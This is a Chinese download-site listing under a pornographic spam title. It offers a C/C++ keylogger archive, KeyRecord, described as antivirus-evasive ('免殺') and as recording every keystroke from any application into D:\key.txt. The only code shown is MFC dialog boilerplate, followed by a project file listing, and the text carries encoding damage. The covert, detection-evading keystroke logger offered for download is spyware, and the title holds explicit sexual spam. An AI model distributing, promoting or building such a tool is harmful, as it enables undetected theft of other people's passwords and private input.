xxxx18一60岁hd中国/日韩女同互慰一区二区/西西人体扒开双腿无遮挡/日韩欧美黄色一级片 - 色护士精品影院www

  • 大小: 13.94MB
    文件類型: .zip
    金幣: 1
    下載: 0 次
    發(fā)布日期: 2023-06-29
  • 語言: C/C++
  • 標簽: 免殺??

資源簡介

免殺、未使用hook鉤子 。基于vs2013開發(fā)的監(jiān)控鍵盤對任何應用程序的操作,日志文件在D盤。key.txt

資源截圖

代碼片段和文件信息


//?KeyRecord.cpp?:?定義應用程序的類行為。
//

#include?“stdafx.h“
#include?“KeyRecord.h“
#include?“KeyRecordDlg.h“

#ifdef?_DEBUG
#define?new?DEBUG_NEW
#endif


//?CKeyRecordApp

BEGIN_MESSAGE_MAP(CKeyRecordApp?CWinApp)
ON_COMMAND(ID_HELP?&CWinApp::onhelp)
END_MESSAGE_MAP()


//?CKeyRecordApp?構造

CKeyRecordApp::CKeyRecordApp()
{
//?支持重新啟動管理器
m_dwRestartManagerSupportFlags?=?AFX_RESTART_MANAGER_SUPPORT_RESTART;

//?TODO:??在此處添加構造代碼,
//?將所有重要的初始化放置在?InitInstance?中
}


//?唯一的一個?CKeyRecordApp?對象

CKeyRecordApp?theApp;


//?CKeyRecordApp?初始化

BOOL?CKeyRecordApp::InitInstance()
{
//?如果一個運行在?Windows?XP?上的應用程序清單指定要
//?使用?ComCtl32.dll?版本?6?或更高版本來啟用可視化方式,
//則需要?InitCommonControlsEx()。??否則,將無法創(chuàng)建窗口。
INITCOMMONCONTROLSEX?InitCtrls;
InitCtrls.dwSize?=?sizeof(InitCtrls);
//?將它設置為包括所有要在應用程序中使用的
//?公共控件類。
InitCtrls.dwICC?=?ICC_WIN95_CLASSES;
InitCommonControlsEx(&InitCtrls);

CWinApp::InitInstance();


AfxEnableControlContainer();

//?創(chuàng)建?shell?管理器,以防對話框包含
//?任何?shell?樹視圖控件或?shell?列表視圖控件。
CShellManager?*pShellManager?=?new?CShellManager;

//?激活“Windows?Native”視覺管理器,以便在?MFC?控件中啟用主題
CMFCVisualManager::SetDefaultManager(RUNTIME_CLASS(CMFCVisualManagerWindows));

//?標準初始化
//?如果未使用這些功能并希望減小
//?最終可執(zhí)行文件的大小,則應移除下列
//?不需要的特定初始化例程
//?更改用于存儲設置的注冊表項
//?TODO:??應適當修改該字符串,
//?例如修改為公司或組織名
SetRegistryKey(_T(“應用程序向導生成的本地應用程序“));

CKeyRecordDlg?dlg;
m_pMainWnd?=?&dlg;
INT_PTR?nResponse?=?dlg.DoModal();
if?(nResponse?==?IDOK)
{
//?TODO:??在此放置處理何時用
//??“確定”來關閉對話框的代碼
}
else?if?(nResponse?==?IDCANCEL)
{
//?TODO:??在此放置處理何時用
//??“取消”來關閉對話框的代碼
}
else?if?(nResponse?==?-1)
{
TRACE(traceAppMsg?0?“警告:?對話框創(chuàng)建失敗,應用程序將意外終止。\n“);
TRACE(traceAppMsg?0?“警告:?如果您在對話框上使用?MFC?控件,則無法?#define?_AFX_NO_MFC_CONTROLS_IN_DIALOGS。\n“);
}

//?刪除上面創(chuàng)建的?shell?管理器。
if?(pShellManager?!=?NULL)
{
delete?pShellManager;
}

//?由于對話框已關閉,所以將返回?FALSE?以便退出應用程序,
//??而不是啟動應用程序的消息泵。
return?FALSE;
}


?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2016-01-15?09:15??KeyRecord\
?????目錄???????????0??2016-01-15?09:15??KeyRecord\Debug\
?????文件????????2062??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.Build.CppClean.log
?????文件?????????323??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.log
?????文件???????42365??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.obj
?????文件????43188224??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.pch
?????文件???????69528??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.res
?????目錄???????????0??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\
?????文件???????73060??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\CL.read.1.tlog
?????文件????????3372??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\CL.write.1.tlog
?????文件?????????204??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\KeyRecord.lastbuildstate
?????文件????????2696??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\cl.command.1.tlog
?????文件????????2158??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\link.command.1.tlog
?????文件????????5970??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\link.read.1.tlog
?????文件????????1366??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\link.write.1.tlog
?????文件?????????798??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\rc.command.1.tlog
?????文件????????3200??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\rc.read.1.tlog
?????文件?????????398??2016-01-15?09:15??KeyRecord\Debug\KeyRecord.tlog\rc.write.1.tlog
?????文件???????62877??2016-01-15?09:15??KeyRecord\Debug\KeyRecordDlg.obj
?????文件??????913885??2016-01-15?09:15??KeyRecord\Debug\stdafx.obj
?????文件?????2264064??2016-01-15?09:15??KeyRecord\Debug\vc120.idb
?????文件?????6647808??2016-01-15?09:15??KeyRecord\Debug\vc120.pdb
?????文件??????108684??2016-01-15?09:15??KeyRecord\KeyRecord.aps
?????文件????????2413??2016-01-15?09:15??KeyRecord\KeyRecord.cpp
?????文件?????????461??2016-01-15?09:15??KeyRecord\KeyRecord.h
?????文件???????10318??2016-01-15?09:15??KeyRecord\KeyRecord.rc
?????文件????????6157??2016-01-15?09:15??KeyRecord\KeyRecord.vcxproj
?????文件????????2069??2016-01-15?09:15??KeyRecord\KeyRecord.vcxproj.filters
?????文件????????5197??2016-01-15?09:15??KeyRecord\KeyRecordDlg.cpp
?????文件?????????724??2016-01-15?09:15??KeyRecord\KeyRecordDlg.h
?????文件????????3899??2016-01-15?09:15??KeyRecord\ReadMe.txt
............此處省略7個文件信息

評論

共有 條評論